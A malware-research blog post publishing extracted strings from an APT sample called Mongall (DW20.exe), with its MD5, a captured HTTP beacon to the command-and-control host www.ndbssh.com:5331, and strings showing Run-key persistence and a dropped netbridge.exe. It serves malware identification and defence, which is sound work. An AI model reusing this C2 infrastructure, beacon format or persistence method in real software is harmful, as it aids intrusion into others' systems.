About contagio exchange

Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy, and Mila too, so this was not a very active site (my fault, probably), so I will just be dumping malware strings here - it often helps in malware identification, and googling is the best way.
With just strings it is not exactly a fun blog to read, but it might become a useful resource over time.
I will not be posting samples here, just MD5s. You can find the corresponding samples on Contagio, or ping me if you can't find them.
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Tuesday, September 3, 2013

Mongall strings - APT

File: DW20.exe
MD5:  d7dd5cda909190c6c03db5e7f8afd721
Size: 24576


GET /3000FC08000024FE0700363635353544304331303530313136300052656D6F746520504300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070161646D696E000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ndbssh.com:5331
Cache-Control: no-cache:
Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich)
.text
`.rdata
@.data
Shared
T$@h
PWVS
_^]3
=TH@
SUV3
WSSSSh
SSPU
_^]3
L<$G
D$$j:P
_^][
_^]3
SUVW
_^][
_^][
t$pV
PjIj
D$ d
QjJj
It$RU
hlA@
L$$PQj
D$ P
u$hTA@
_^]3
=$0@
D$DP
D$(?
D$$$
SPSSh
T$pj
T$lQR
_^][
_^][
_^][
_^][
_^][
=tH@
hpH@
htH@
 SVW
5\H@
%x0@
CopyFileA
GetSystemDirectoryA
GetModuleFileNameA
LoadLibraryA
Sleep
CloseHandle
SetEvent
OpenEventA
WaitForSingleObject
GetProcAddress
FreeLibrary
CreateEventA
ExitProcess
GetVolumeInformationA
GetComputerNameA
GlobalMemoryStatus
GetSystemInfo
GetVersionExA
GetVersion
KERNEL32.dll
USER32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyA
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
ADVAPI32.dll
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
InternetSetOptionA
WININET.dll
??3@YAXPAX@Z
??2@YAPAXI@Z
strchr
atoi
malloc
printf
sprintf
_beginthreadex
free
strrchr
__dllonexit
_onexit
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
AVICAP32.dll
www.ndbssh.com
\netbridge.exe
msnetshare
%systemroot%\netbridge.exe
Software\Microsoft\Windows\CurrentVersion\Run
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
update exe file false
http://%s:%d/%d%s
ProcessTrans
~MHz
Hardware\Description\System\CentralProcessor\0
%08x
%s%s

Unicode Strings:
---------------------------------------------------------------------------
jjjj